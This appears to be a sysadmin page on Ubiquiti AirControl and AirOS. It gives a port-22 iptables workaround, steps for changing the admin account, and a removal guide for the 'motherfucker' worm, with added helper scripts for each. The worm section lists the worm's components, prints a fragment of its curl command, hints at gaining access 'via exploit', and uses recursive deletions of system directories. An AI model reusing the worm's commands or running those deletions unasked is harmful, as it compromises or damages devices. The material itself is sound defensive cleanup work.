There is a problem with AirControl 1 (version 1.4.2-beta.3839): the HTTP
connection from the antenna to the server tries to connect to port 22 on the
server side, no matter what is configured in the AirControl server settings
(there port 9080 is configured).
Settings in AirControl Server (Admin / System Settings):
    Default Device SSH Port: 22
    AirControl Server Address: name-of-the-server.domain
    AirControl Server HTTP Port: 9080
After provisioning the antenna we check the settings on the antenna via the CLI:
$ mca-ctrl -t status
So the correct server port is not set; instead the server sets port 22. Of
course nothing on the server is listening on port 22 for the connection from
the antenna.
The heartbeat gets through if I manually set the correct port on the antenna.
After that the antenna comes online instantly. Of course the setting is lost as
soon as the antenna is disconnected / unprovisioned, and each time after
reconnecting the correct port has to be set again. That is of course too
The easier way is to make the server listen on port 22. Since there is no way
to change the server port, it is easier to create a port redirect with iptables.
On the server run (adapt if necessary):
# iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 22 -j REDIRECT --to-port 9080
After that all antennas come online by themselves.
mca-ctrl -t connect -s http://name-of-the-server.domain:22/heartbeat
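The redirect above is usually re-applied after every reboot or by a config-management run, and a plain `-A` stacks a duplicate rule each time. The script below is an added example (not from the original post) that checks for the rule with `-C` before appending it and can remove it again once the server is fixed. Interface and ports are the ones from the post but are passed as parameters; `--to-ports` is the documented spelling of the REDIRECT option, iptables also accepts the abbreviated `--to-port` used above. One caveat the post's own situation hides: a PREROUTING redirect catches every TCP connection to port 22 arriving on that interface, so if the server's sshd ever listens on 22 there, it becomes unreachable on that interface; the author's server has nothing on 22, which is what makes the trick safe.

```shell
#!/bin/sh
# Idempotent port redirect for AirControl antennas that insist on port 22.
# Added example; interface and ports are assumptions passed as arguments.
IPTABLES="${IPTABLES:-iptables}"   # overridable (dry runs, tests)

# redirect_rule IFACE FROM_PORT TO_PORT -> prints the rule specification that
# -C (check), -A (append) and -D (delete) all share
redirect_rule() {
    printf 'PREROUTING -i %s -p tcp --dport %s -j REDIRECT --to-ports %s\n' "$1" "$2" "$3"
}

# ensure_redirect IFACE FROM_PORT TO_PORT: add the rule only if it is missing
ensure_redirect() {
    spec=$(redirect_rule "$1" "$2" "$3")
    # word splitting of $spec is intended: each token is one iptables argument
    if "$IPTABLES" -t nat -C $spec 2>/dev/null; then
        echo "redirect $2 -> $3 on $1 already present"
    else
        "$IPTABLES" -t nat -A $spec && echo "redirect $2 -> $3 on $1 added"
    fi
}

# remove_redirect IFACE FROM_PORT TO_PORT: undo the redirect (e.g. after the
# antennas are fixed to use the configured HTTP port)
remove_redirect() {
    spec=$(redirect_rule "$1" "$2" "$3")
    "$IPTABLES" -t nat -D $spec 2>/dev/null
}

# Stand-alone usage on the AirControl server, as root:
#   ./aircontrol-redirect.sh eth0 22 9080
[ $# -eq 3 ] && ensure_redirect "$1" "$2" "$3"
```

Check the result with `iptables -t nat -L PREROUTING -n --line-numbers`; the rule should appear exactly once no matter how often the script has run.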
How to change the password and admin user on an AirOS device via the command line interface and SSH
Such a change might be necessary if the password is not accepted by the login
of the web interface, e.g. because it is too long.
If you make these changes yourself step by step, it is important to sync all
changes; otherwise you can easily lock yourself out of your antenna (and having
to drive to a remote place to reset your antenna is never what you want).
This is exactly what is done by the web interface if you change the username or
Add a new line for the new admin to /etc/passwd; copy & paste it from another
device (hash type / length should be the same, to be on the safe side). The
line for the old admin can stay there; it will be deleted automatically later.
Edit /tmp/system.cfg and look for the line users.1.name=adminusername.
Edit users.1.name to correspond with the username added to /etc/passwd.
Copy & paste the password hash from this user's line in /etc/passwd to /tmp/system.cfg.
Run cfgmtd -p /etc/ -w (this writes the configuration to persistent storage).
The public key authentication set up previously (as a backup in case something
went wrong with the passwords) will automatically work for the new admin user.
You can log in via SSH with all usernames that are listed in /etc/passwd.
When rebooting, all other admin usernames apart from the one set as
users.1.name will be removed from /etc/passwd.
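The lock-out the post warns about happens when /etc/passwd and /tmp/system.cfg disagree about who the admin is. The script below is an added example (not from the original post) that performs the steps above against files given as parameters and then verifies the result, so it can be rehearsed on copies of the two files before touching the live ones. Assumptions: the hash in system.cfg is stored under users.1.password (the post names only users.1.name), and the new admin keeps the uid/gid/home/shell of the current admin's line.

```shell
#!/bin/sh
# Admin change on AirOS with a consistency check. Added example; the key name
# users.1.password is an assumption, the post names only users.1.name.

# cfg_get KEY FILE -> value of KEY=value in a system.cfg (first match)
cfg_get() {
    key_re=$(printf '%s' "$1" | sed 's/\./\\./g')   # escape the dots in the key
    sed -n "s/^$key_re=//p" "$2" | head -n 1
}

# passwd_hash USER FILE -> hash field of USER; exit status 1 if USER is absent
passwd_hash() {
    awk -F: -v u="$1" '$1 == u { print $2; found = 1 } END { if (!found) exit 1 }' "$2"
}

# check_admin_sync PASSWD SYSCFG -> 0 if users.1.name has a passwd line whose
# hash equals users.1.password; non-zero with a reason otherwise
check_admin_sync() {
    name=$(cfg_get users.1.name "$2")
    cfg_hash=$(cfg_get users.1.password "$2")
    [ -n "$name" ] || { echo "users.1.name missing in $2"; return 1; }
    pw_hash=$(passwd_hash "$name" "$1") || { echo "$name has no line in $1"; return 2; }
    [ "$pw_hash" = "$cfg_hash" ] || { echo "hash for $name differs between $1 and $2"; return 3; }
    echo "ok: admin $name is consistent in $1 and $2"
}

# airos_set_admin NEWUSER NEWHASH PASSWD SYSCFG: append a passwd line for
# NEWUSER (rest of the line copied from the current admin), point users.1.name
# and users.1.password at it, then verify. Run cfgmtd -p /etc/ -w afterwards.
airos_set_admin() {
    new="$1"; hash="$2"; pw="$3"; cfg="$4"
    old=$(cfg_get users.1.name "$cfg")
    old_line=$(grep "^$old:" "$pw" | head -n 1)
    [ -n "$old_line" ] || { echo "current admin '$old' not in $pw"; return 1; }
    rest=$(printf '%s' "$old_line" | cut -d: -f3-)     # uid:gid:gecos:home:shell
    printf '%s:%s:%s\n' "$new" "$hash" "$rest" >> "$pw"
    # crypt hashes use only [A-Za-z0-9./$], so '|' is a safe sed delimiter
    sed -e "s|^users\.1\.name=.*|users.1.name=$new|" \
        -e "s|^users\.1\.password=.*|users.1.password=$hash|" "$cfg" > "$cfg.tmp" \
        && mv "$cfg.tmp" "$cfg"
    check_admin_sync "$pw" "$cfg"
}

# Stand-alone usage on the device (rehearse on copies first):
#   . ./airos-admin.sh; check_admin_sync /etc/passwd /tmp/system.cfg
#   airos_set_admin newadmin '<hash copied from another device>' /etc/passwd /tmp/system.cfg
```

Keep the SSH session that runs this open and test a second login with the new user before running cfgmtd and rebooting; the public-key login the post recommends as a fallback is what saves you if the check passes but the web interface still refuses the password.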
How to remove the motherfucker virus / worm
It is written rather simply and can be removed without any major problems.
The virus does (at least) the following things:
create a system account (mother, moth3r, motherfucker or similar)
store and camouflage its files somewhere on the filesystem
make sure it gets loaded at every reboot
scan the network around it to distribute itself, i.e. infect other devices
set aliases for the shell so it gets run / loaded, e.g. when the user runs the ps command (nice one! :) )
There are 3 variants of the motherfucker virus.
First variant: all the files of the virus are located in /etc/persistent:
    the virus itself
    start script to load and run itself at every boot
    directory for dropbear settings, public keys etc.
Commands to remove the worm:
cd /etc/persistent/
rm -R .mf
sed -i "/^mother/d" /etc/passwd
(or open it in vi and delete the respective line)
cfgmtd -p /etc/ -w
Second variant: all the files of the virus are located in /var/lib/dhcp.
Probably motherfucker can use /var/lib/dhcp/.ssh/authorized_keys, so you have
to write your own key (via exploit) into that file to be able to log in if your
password doesn't work.
rm -r /var/lib/dhcp
Third (most sophisticated) variant: the virus writes itself to /var/bin/cgi and runs itself at every boot from
XM.v5.5.6# ls -la .mf
drwxrwxr-x 2 moth3r admin 240 May 28 2013 .
drwxr-xr-x 4 moth3r admin 200 May 28 2013 ..
-rwxrwxr-x 1 moth3r admin 1529 Jun 3 2016 download
-rwxr-xr-x 1 moth3r admin 1517 Dec 12 19:19 infect
-rw------- 1 moth3r admin 806 May 25 2016 mfid
-rw-r--r-- 1 moth3r admin 395 May 25 2016 mfid.pub
-rwxrwxr-x 1 moth3r admin 2847 Jun 3 2016 mother
-rwxrwxr-x 1 moth3r admin 577 Jun 1 2016 p
-rw-rw-r-- 1 moth3r admin 161 May 30 2016 passlst
-rw-rw-r-- 1 moth3r admin 84 May 25 2016 passwd
-rwxrwxr-x 1 moth3r admin 1206 May 31 2016 scan
-rwxrwxr-x 1 moth3r admin 411 May 30 2016 sprd
download: download itself
infect: infect other vulnerable devices
mother: run discover to find devices, write the result to a file, infect the found devices, change the SSID and do other fancy stuff
p: check if the account moth3r exists, if not create it, modify start scripts, empty authorized_keys, write config, reboot
passlst: password file for the brute force attack
passwd: passwd file to be copied to /etc/passwd
scan: scan and infect its own subnet
sprd: infect other random IP addresses
sh -c LD_LIBRARY_PATH=/etc/persistent/.mf/ ./curl -s
rm -r .mf
After successful cleaning, update your firmware immediately! Otherwise your
device will soon be infected again.
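The three variants above differ only in where the files live, so one check can cover all of them. The script below is an added example (not from the original post) that reports every indicator the post lists (the three directories, a moth* account in /etc/passwd, planted shell aliases and boot-hook lines) and removes them; ROOT is a path prefix so it can be run against a copy of a device's filesystem first. Assumptions: the boot hooks inspected are AirOS's /etc/persistent/rc.prestart and rc.poststart (the post says only "start script") and the ps alias is looked for in /etc/profile. Note also that the removal command `sed -i "/^mother/d" /etc/passwd` given for the first variant matches mother and motherfucker but not moth3r, which is the account owning the files in the listing above; the pattern below covers all three spellings.

```shell
#!/bin/sh
# Indicator scan and cleanup for the mf worm variants described in the post.
# Added example; hook file names and the alias location are assumptions.

MF_DIRS="/etc/persistent/.mf /var/lib/dhcp /var/bin/cgi"   # variants 1, 2, 3
MF_HOOKS="/etc/profile /etc/persistent/rc.prestart /etc/persistent/rc.poststart"
MF_ACCOUNT_RE='^moth[^:]*:'                                 # mother, moth3r, motherfucker

# mf_grep OPT FILE: grep for the lines the worm plants (its directory, the ps alias)
mf_grep() {
    opt="$1"; shift
    grep "$opt" -e '\.mf' -e 'alias ps=' "$@"
}

# mf_scan ROOT: print each indicator found; return value is their count (0 = clean)
mf_scan() {
    root="${1%/}"; n=0
    for d in $MF_DIRS; do
        [ -e "$root$d" ] && { echo "found: $d"; n=$((n + 1)); }
    done
    if [ -f "$root/etc/passwd" ] && grep -q "$MF_ACCOUNT_RE" "$root/etc/passwd"; then
        echo "found: account(s): $(grep "$MF_ACCOUNT_RE" "$root/etc/passwd" | cut -d: -f1 | tr '\n' ' ')"
        n=$((n + 1))
    fi
    for f in $MF_HOOKS; do
        [ -f "$root$f" ] && mf_grep -q "$root$f" && { echo "found: worm lines in $f"; n=$((n + 1)); }
    done
    return $n
}

# mf_clean ROOT: remove the directories, the account lines and the planted
# hook lines (everything else in the hook files is kept). On a real device
# finish with: cfgmtd -p /etc/ -w ; reboot ; then update the firmware.
mf_clean() {
    root="${1%/}"
    for d in $MF_DIRS; do
        rm -rf "$root$d"
    done
    if [ -f "$root/etc/passwd" ]; then
        grep -v "$MF_ACCOUNT_RE" "$root/etc/passwd" > "$root/etc/passwd.tmp" || :
        mv "$root/etc/passwd.tmp" "$root/etc/passwd"
    fi
    for f in $MF_HOOKS; do
        [ -f "$root$f" ] || continue
        mf_grep -v "$root$f" > "$root$f.tmp" || :
        mv "$root$f.tmp" "$root$f"
    done
}

# Stand-alone usage on the device:  ./mf-check.sh scan   or   ./mf-check.sh clean
case "${1-}" in
    scan)  mf_scan / ;;
    clean) mf_clean / && mf_scan / ;;
esac
```

Run the scan first and read its output: the account name it prints is the one the author's sed line has to match, and a hook file that still shows worm lines after cleaning means the variant on that device uses a start script the list above does not cover.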